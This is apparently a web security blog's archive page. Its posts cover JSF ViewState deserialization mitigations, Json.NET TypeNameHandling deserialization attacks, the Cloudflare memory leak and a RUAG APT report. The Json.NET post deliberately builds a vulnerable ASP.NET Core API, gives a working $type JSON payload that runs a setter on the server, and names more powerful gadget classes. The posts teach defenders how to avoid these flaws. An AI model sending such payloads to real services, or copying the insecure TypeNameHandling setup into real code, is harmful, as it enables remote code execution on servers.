Unfortunately, in some even older versions that mitigation approach does not work: according to this great StackOverflow answer in the JSF implementation documentation it was incorrectly documented that the param com.sun.faces.ClientStateSavingPassword is used to change the Client State Saving Password, while the parameter up until 2.1.18 was accidentally called ClientStateSavingPassword. So providing a Client State Saving Password as documented didn’t have an effect! In Mojarra 2.1.19 and later versions they changed the parameter name to the documented name com.sun.faces.ClientStateSavingPassword.

By default Mojarra nowadays uses AES as encryption algorithm and HMAC-SHA256 to authenticate the ViewState.

Mojarra: ViewState configured to reside on the client

The default javax.faces.STATE_SAVING_METHOD setting of Mojarra is server. A developer needs to manually change it to client so that Mojarra becomes vulnerable to the above described attack scenario. If a serialized ViewState is sent to the server but Mojarra uses server side ViewState saving it will not try to deserialize it (However, a StringIndexOutOfBoundsException may occur).

Mojarra: Mitigation

When using Mojarra with a server-side ViewState nothing has to be done.

When using Mojarra < 2.2 and a client-side ViewState there are following possible mitigations:

  • Update Mojarra to 2.0.11-04 respectively 2.1.29-08.
  • Use a server-side ViewState instead of a client-side ViewState.
  • When using older Versions of Mojarra and an update or switching to a server-side ViewState is not possible: set a ViewState password as temporary solution and make sure it is the right parameter (not necessarily the one in the corresponding documentation)

For later Mojarra versions:

  • Check that the ViewState encryptions is not disabled via the param: com.sun.faces.disableClientStateEncryption

Apache MyFaces

Apache MyFaces is the other big and widely used JSF implementation.

MyFaces: unencrypted ViewState

MyFaces does encrypt the ViewState by default, as stated in their Security configuration Wiki page:

Encryption is enabled by default. Note that encription must be used in production environments and disable it could only be valid on testing/development environments.

However, it is possible to disable ViewState encryption by setting the parameter org.apache.myfaces.USE_ENCRYPTION to false. (Also it would be possible to use encryption but manually set an easy guessable password). By default the ViewState encryption secret changes with every server restart.

By default MyFaces uses DES as encryption algorithm and HMAC-SHA1 to authenticate the ViewState. It is possible and recommended to configure more recent algorithms like AES and HMAC-SHA256.

MyFaces: ViewState configured to reside on the client

The default javax.faces.STATE_SAVING_METHOD setting of MyFaces is server. But: MyFaces does always deserialize the ViewState regardless of that setting. So it is of great importance to not disable encryption when using MyFaces!

(We created an issue in the MyFaces bug tracker: MYFACES-4133 Don’t deserialize the ViewState-ID if the state saving method is server, maybe this time the wish for more secure defaults will catch on.)

MyFaces: Mitigation

When using MyFaces make sure that encryption of the ViewState is not disabled (via org.apache.myfaces.USE_ENCRYPTION) regardless if the ViewState is stored on the client or the server.

Final thoughts

Most facts about JSF ViewStates and their dangers presented in this blog post are not exactly new but it seems they were never presented in such a condensed way. It showed once more that seemingly harmless configuration changes can lead to serious vulnerabilities.

=> One of the problems seems to be that there is not enough knowledge transfer between security researchers and developers who actually use and configure libraries that might be dangerous when configured in certain ways.


13 Jun 2017 | Peter Stöckli

How to configure Json.NET to create a vulnerable web API

tl;dr No, of course, you don’t want to create a vulnerable JSON API. So when using Json.NET: Don’t use another TypeNameHandling setting than the default: TypeNameHandling.None.

Intro

In May 2017 Moritz Bechler published his MarshalSec paper where he gives an in-depth look at remote code execution (RCE) through various Java Serialization/Marshaller libraries like Jackson and XStream. In the conclusion of the detailed paper, he mentions that this kind of exploitation is not limited to Java but might also be possible in the .NET world through the Json.NET library. Newtonsoft’s Json.NET is one of the most popular .NET Libraries and allows to deserialize JSON into .NET classes (C#, VB.NET).

So we had a look at Newtonsoft.Json and indeed found a way to create a web application that allows remote code execution via a JSON based REST API. For the rest of this post we will show you how to create such a simple vulnerable application and explain how the exploitation works. It is important to note that these kind of vulnerabilities in web applications are most of the time not vulnerabilities in the serializer libraries but configuration mistakes. The idea is of course to raise awareness with developers to prevent such flaws in real .NET web applications.

The sample application

The following hypothetical ASP.NET Core sample application was tested with .NET Core 1.1. For other .NET framework versions slightly different JSONs might be necessary.

TypeNameHandling

The key in making our application vulnerable for “Deserialization of untrusted data” is to enable type name handling in SerializerSettings of Json.NET. This tells Json.NET to write type information in the field “$type” of the resulting JSON and look at that field when deserializing.

In our sample application we set this SerializerSettings globally in the ConfigureServices method in Startup.cs:

Startup.cs
[..]
services.AddMvc().AddJsonOptions(options =>
{
    options.SerializerSettings.TypeNameHandling = TypeNameHandling.All;
});
[..]


Following TypeNameHandlings are vulnerable against this attack:

TypeNameHandling.All
TypeNameHandling.Auto
TypeNameHandling.Arrays
TypeNameHandling.Objects

In fact the only kind that is not vulnerable is the default: TypeNameHandling.None

The official Json.NET TypeNameHandling documentation explicitly warns about this:

TypeNameHandling should be used with caution when your application deserializes JSON from an external source. Incoming types should be validated with a custom SerializationBinder when deserializing with a value other than None.

But as the MarshalSec paper points out: not all developers read the documentation of the libraries they’re using.

The REST web service

To offer a remote attack possibility in our web application we created a small REST API that allows POSTing a JSON object.

InsecureController.cs
[..]
[HttpPost]
public IActionResult Post([FromBody]Info value)
{
    if (value == null)
    {
        return NotFound();
    }
    return Ok();
}
[..]


As you may have noticed we accept a body value from the type Info, which is our own small dummy class:

Info.cs
public class Info
{
    public string Name { get; set; }
    public dynamic obj { get; set; }
}

The exploitation

To “use” our newly created vulnerability we simply POST a type-enhanced JSON to our web service:

POSTed JSON with HTTP Client

Et voilà: we executed code on the server!

Wait… what? But how?

Here’s how it works

When sending a custom JSON to a REST service that is handled by a deserializer that has support for custom type name handling in combination with the dynamic keyword the attacker can specify the type he’d like to have deserialized on the server.

So let’s have a look at the JSON we sent:

Rogue JSON
{
	"obj": {
		"$type": "System.IO.FileInfo, System.IO.FileSystem",
		"fileName": "rce-test.txt",
		"IsReadOnly": true
	}
}


The line:

"$type": "System.IO.FileInfo, System.IO.FileSystem",

specifies the class FileInfo from the namespace System.IO in the assembly System.IO.FileSystem.

The deserializer will instantiate a FileInfo object by calling the public constructor public FileInfo(String fileName) with the given fileName “rce-test.txt” (a sample file we created at the root of our insecure web app). Json.NET prefers parameterless default constructors over one constructor with parameters, but since the default constructor of FileInfo is private it uses the one with one parameter. Afterwards it will set “IsReadOnly” to true. However, this does not simply set the “IsReadOnly” flag via reflection to true. What happens instead is that the deserializer calls the setter for IsReadOnly and the code of the setter is executed.

What happens when you call the IsReadOnly setter on a FileInfo instance is that the file is actually set to read-only.

We see that indeed the read-only flag has been set on the rce-test.txt file on the server: rce-test.txt file properties with read-only flag set

A small side effect of this vulnerable service implementation is that we also can check if a file exists on the server. If the file sent in the “fileName” field does not exist an exception is thrown when the setter for IsReadOnly is called and the server returns NotFound(404) to the caller.

To perform even more sinister work an attacker could search the .NET framework codebase or third party libraries for classes that execute code in the constructor and/or setters. The FileInfo class here is just used as a very simple example.

Summary

When providing Json.NET based REST services always leave the default TypeNameHandling at TypeNameHandling.None. When other TypeNameHandling settings are used an attacker might be able to provide a type he wants the serializer to deserialize and as a result unwanted code could be executed on the server.

The described behavior is of course not unique to Json.NET but is also implemented by other libraries that support Serialization e.g. when using System.Web.Script.Serialization.JavaScriptSerializer with a type resolver (e.g. SimpleTypeResolver).

Update (28 Jul 2017)

At Black Hat USA 2017 Alvaro Muñoz and Oleksandr Mirosh held a talk with the title “Friday the 13th: JSON Attacks”. Muñoz and Mirosh had an in-depth look at different .NET (FastJSON, Json.NET, FSPickler, Sweet.Jayson, JavascriptSerializer DataContractJsonSerializer) and Java (Jackson, Genson, JSON-IO, FlexSON, GSON) JSON libraries. The conclusions regarding Json.NET are the same as in this blog post: Basically to not use another TypeNameHandling than TypeNameHandling.None or use a SerializationBinder to white list types (as in the documentation of Json.NET).

They also presented new gadgets, which allow more sinister attacks than the one published in this blog post (the gadgets might not work with all JSON/.NET framework combinations):

  • System.Configuration.Install.AssemblyInstaller: "Execute payload on local assembly load"
  • System.Activities.Presentation.WorkflowDesigner: "Arbitrary XAML load"
  • System.Windows.ResourceDictionary: "Arbitrary XAML load"
  • System.Windows.Data.ObjectDataProvider: "Arbitrary Method Invocation"

In addition to their findings they had a look at .NET open source projects which made use of any of those different JSON libraries with type support and found several vulnerabilities:

Both the white paper[pdf] and the slides[pdf] are available on the Black Hat site.

24 Feb 2017 | Peter Stöckli

The Cloudflare leak

Introduction

On the 23rd of February Tavis Ormandy of Google’s Project Zero made following security vulnerability accessible to the public: Cloudflare Reverse Proxies are Dumping Uninitialized Memory. The vulnerability affects many Cloudflare customers and especially their users. A vulnerable software component in Cloudflare’s reverse proxies led to the disclosure of Personally identifiable information (PII) of users around the world. Since Cloudflare reverse proxies are shared between customers, user information could emerge in a totally different place on the Internet.

The report describes how the security researchers at Google experienced the “cloudbleed” situation:

We fetched a few live samples, and we observed encryption keys, cookies, passwords, chunks of POST data and even HTTPS requests for other major cloudflare-hosted sites from other users. Once we understood what we were seeing and the implications, we immediately stopped and contacted cloudflare security.

The report contains redacted user information from the ride-sharing unicorn Uber, health tracking company FitBit and dating site OkCupid.

How Cloudflare works

Let’s have a quick look at how Cloudflare works. Typically Cloudflare’s customers use their services for DDoS (Distributed Denial of Service) protection. Often the customers use DNS services provided by Cloudflare and/or their traffic is redirected via Cloudflare’s reverse proxies before the traffic is sent to the customers web server. From a user’s point of view: the user’s traffic to the reverse proxy is encrypted, where it’s decrypted and analyzed by Cloudflare’s algorithms.

+---------+             +------------+               +--------------+
|  User   |  via HTTPS  | Cloudflare |  via HTTP(S)  |   Customer   |
|(Browser)+------------>+ (Reverse   +-------------->| (Web server) |
|(Mobile) |             |   Proxy)   |               |              |
+---------+             +------------+               +--------------+

Cloudflare’s Response

Cloudflare has published a detailed report, where Cloudflare’s talented security guys describe the technical part of the vulnerability: Incident report on memory leak caused by Cloudflare parser bug.

They write that the earliest leaking could have started on the 22th September of 2016.

They also write:

The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines. We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything.

However users on Twitter reported that they still found cached web pages using Google or Bing.

What’s important?

One important point is that not necessarily a Cloudflare customer’s site was leaking information about their users, but a totally different site of another Cloudflare customer could have been leaking that user information.

Another important point is that the listed search engines are not the only ones collecting and storing information from websites in the Internet. Think of caches, web crawlers, archive sites, solutions that store the content of websites for legal reasons, the list goes on…

Even our newly developed web application security scanner called SecBot, that continuously scans web applications for vulnerabilities stores the HTTP responses of the requests. Since we’re still in the development phase, SecBot hasn’t yet tested a site hosted behind a Cloudflare Reverse Proxy. If that would have been the case the database of SecBot could contain sensitive data of Cloudflare customers. And so could many other crawlers in the world.

And now?

If you want to act proactively you can change your passwords on sites to be known using Cloudflare (however not all sites using Cloudflare services are affected). Many different websites will probably request you to change your password and revoke OAuth tokens in the next days. As said before the infosec guys working at Cloudflare are found to be competent and will hopefully find a solution that prevents such a huge issue from ever happening again.

26 May 2016 | Peter Stöckli

RUAG APT report published by government agency

Introduction

The Swiss governmental computer emergency response team (GovCERT.ch) has published a detailed technical report about the Advanced Persistent Threat (APT) that targeted RUAG. RUAG, best-known for RUAG Defence is originally a spin-off of the Swiss army and is fully owned by the Swiss state. Remarkable and applaudable is the fact that it was decided to share this kind of information. The motivation of the GovCERT is explained in the conclusion:

"[..] One of the most effective countermeasures from a victim’s perspective is the sharing of information about such attacks with other organizations, also crossing national borders. This is why we decided to write a public report about this incident, and this is why we strongly believe to share as much information as possible. If this done by any affected party, the price for the attacker raises, as he risks to be detected in every network he attacked in different countries. [..]"

Case

The attack that lasted from an unknown date (assumed in 2014) to the the 3rd May of 2016 is introduced like this:

"The cyber attack is related to a long running campaign of the threat actor around Epic/Turla/Tavdig. The actor has not only infiltrated many governmental organizations in Europe, but also commercial companies in the private sector in the past decade. RUAG has been affected by this threat since at least September 2014. The actor group used malware that does not encompass any root kit technologies (even though the attackers have rootkits within their malware arsenal). An interesting part is the lateral movement, which has been done with a lot of patience. [..]"

The report goes into technical details and reveals interesting details of the inner workings and communication channels of the observed malware. The researches that disassembled the binaries analyzed the encryption algorithms and communication methods used.

E. g. According to page 20 of the report the malware asymmetrically encrypted the stolen data, encoded it with Base64 and put it into a server response like this:

<html>
    <head>
        <title>Authentication Required</title>
    </head>
    <body>
        <div>B2...KD9eg=</div>
    </body>
</html>

This seems like a fairly uncharacteristically move for a host that does normally not act as a web server and should be detectable for an Application Firewall.

Recommendations

The report makes some generic recommendations that should help companies to prevent such attacks or at least reduce their impact and improve the forensic readiness in case something happens. Some of those countermeasure recommendations on the system level are:

  • Consider using Applocker, a technique from Microsoft, which allows you to decide, based on GPOs (Group Policy Objects), which binaries are allowed to be executed, and under which paths. [..]
  • Reduce the privileges a user has when surfing the web or doing normal office tasks. High privileges may only be used when doing system administration tasks.
  • This actor, as well as many other actor groups, relies on the usage of “normal” tools for their lateral movement. The usage of such tools can be monitored. E.g. the start of a tool such as psexec.exe or dsquery.exe from within a normal user context should raise an alarm.
  • Keep your systems up-to-date and reduce their attack surface as much as possible (e.g.: Do you really need to have Flash deployed on every system?)
  • Use write blockers and write protection software for your USB/Firewire devices, or even disable them for all client devices
  • Block the execution of macros, or require signed macros

Side note: On the 19th of April 2016 Casey Smith disclosed an AppLocker Bypass that instruments regsvr32 to execute remote scripts.

Other areas of recommendations concern the Active Directory, the network, logging, system management and organizational aspects. Most of the recommendations sound straightforward and should already be in place in similar manner in secure environments of bigger companies. Interestingly the report does not reference ISO 27001, ISO 27002 or any other standards in the information security field, while its generic recommendations would align very well. Most likely the main focus of the authors was to give practical tips free of management lingo, reaching a broad, heterogeneous audience.

In general, the work that went into creating and publishing this report is appreciated and will hopefully have an impact.

03 May 2016 | Peter Stöckli

Alphabot Security Blog

We slightly redesigned our website and started the Alphabot Security Blog where we will write about security vulnerabilities and development tips for web applications.